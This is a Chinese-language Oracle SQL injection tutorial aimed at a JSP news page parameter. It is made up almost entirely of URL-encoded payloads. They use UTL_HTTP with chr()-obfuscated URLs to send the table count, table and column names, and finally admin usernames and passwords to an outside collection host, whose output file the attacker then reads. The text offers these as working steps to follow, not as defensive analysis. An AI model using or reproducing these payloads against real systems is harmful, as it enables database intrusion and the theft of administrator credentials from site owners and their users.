判断下utl_http是否存在:

and%20(select%20count(*)%20from%20all_objects%20where%20object_name='UTL_HTTP')>0--

统计表数:

oracle注入,utl_http方法

利用pangolin官方提供的功能,不再用nc来反弹,还要是外网才来反弹,绝对原创

第一步:

/shownews.jsp?val_id=9559%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20count(*)%20from%20user_tables%20where%201=1))%20from%20dual)

or [ in (select utl_http.request(http://www.nosec.org/product/oracle_data.php?id=%7C%7C(select%20count(*)%20from%20user_tables%20where%201=1))%20from%20dual)%20and%201=1

第二步:

再访问 http://www.nosec.org/product/oracle_info.txt 如果是表名会得到表的16进制.

爆第一个表名:

/shownews.jsp?val_id=9559%20or%20chr(91)%20in%20(select%20utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20a%20from%20(select%20rownum%20r,a%20from%20(select%20rownum%20r,%20rawtohex(table_name)%20as%20a%20from%20user_tables%20where%20rownum%3C=1%20and%201=1%20order%20by%201%20desc)t%20where%20r%3E1-1%20order%20by%201)t))%20from%20dual)%20and%201=1

N个表:rownum<=N and r>N-1

Or [ in (select utl_http.request(http://www.nosec.org/product/oracle_data.php?id=)%7C%7C(select a from (select rownum r,a from (select rownum r, rawtohex(table_name) as a from user_tables where rownum%3C=1 and 1=1 order by 1 desc)t where r%3E1-1 order by 1)t)) from dual) and 1=1

第二步: 访问 http://www.nosec.org/product/oracle_info.txt 会得到一个16进制,转换后就是表名.

统计列数: 如admin=table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78)

or chr(91) in (select utl_http.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select count(*) from user_tab_columns where table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78))) from dual) and 1=1

爆列名:

第一个列名:

and%20UTL_HTTP.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20COLUMN_NAME%20from%20COLS%20where%20table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78)%20and%20rownum=1))=1--

访问http://www.nosec.org/product/oracle_info.txt

第二个列名:COLUMN_NAME<>'ID'排除法

and%20UTL_HTTP.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20COLUMN_NAME%20from%20COLS%20where%20table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78)%20and%20rownum=1 and COLUMN_NAME<>'ID'))=1--

rownum=1 and COLUMN_NAME<>'ID' 或: rownum=1 and column_name not in('id','username')

第三个列名:

and%20UTL_HTTP.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select%20COLUMN_NAME%20from%20COLS%20where%20table_name=chr(65)%7C%7Cchr(68)%7C%7Cchr(77)%7C%7Cchr(73)%7C%7Cchr(78)%20and%20rownum=1 and COLUMN_NAME<>'ID' and COLUMN_NAME<>'USERNAME'))=1--

ORACLE数据库一定要记得字段的大小写:

爆内容:ADMINUSERNAME PASSWORD

第一个用户名:

and%20UTL_HTTP.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select USERNAME from ADMIN where rownum=1))=1--

第二个用户名:

and%20UTL_HTTP.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select USERNAME from ADMIN where rownum=1 and USERNAME<>'kiki'))=1--

密码同理:

只需把PASSWORD字段换成USERNAME就可以

用户密码:

and%20UTL_HTTP.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select PASSWORD from ADMIN where rownum=1))=1--

或:

and%20UTL_HTTP.request(chr(104)%7C%7Cchr(116)%7C%7Cchr(116)%7C%7Cchr(112)%7C%7Cchr(58)%7C%7Cchr(47)%7C%7Cchr(47)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(119)%7C%7Cchr(46)%7C%7Cchr(110)%7C%7Cchr(111)%7C%7Cchr(115)%7C%7Cchr(101)%7C%7Cchr(99)%7C%7Cchr(46)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(103)%7C%7Cchr(47)%7C%7Cchr(112)%7C%7Cchr(114)%7C%7Cchr(111)%7C%7Cchr(100)%7C%7Cchr(117)%7C%7Cchr(99)%7C%7Cchr(116)%7C%7Cchr(47)%7C%7Cchr(111)%7C%7Cchr(114)%7C%7Cchr(97)%7C%7Cchr(99)%7C%7Cchr(108)%7C%7Cchr(101)%7C%7Cchr(95)%7C%7Cchr(100)%7C%7Cchr(97)%7C%7Cchr(116)%7C%7Cchr(97)%7C%7Cchr(46)%7C%7Cchr(112)%7C%7Cchr(104)%7C%7Cchr(112)%7C%7Cchr(63)%7C%7Cchr(105)%7C%7Cchr(100)%7C%7Cchr(61)%7C%7C(select PASSWORD from ADMIN where rownum=1 and USERNAME='kiki'))=1--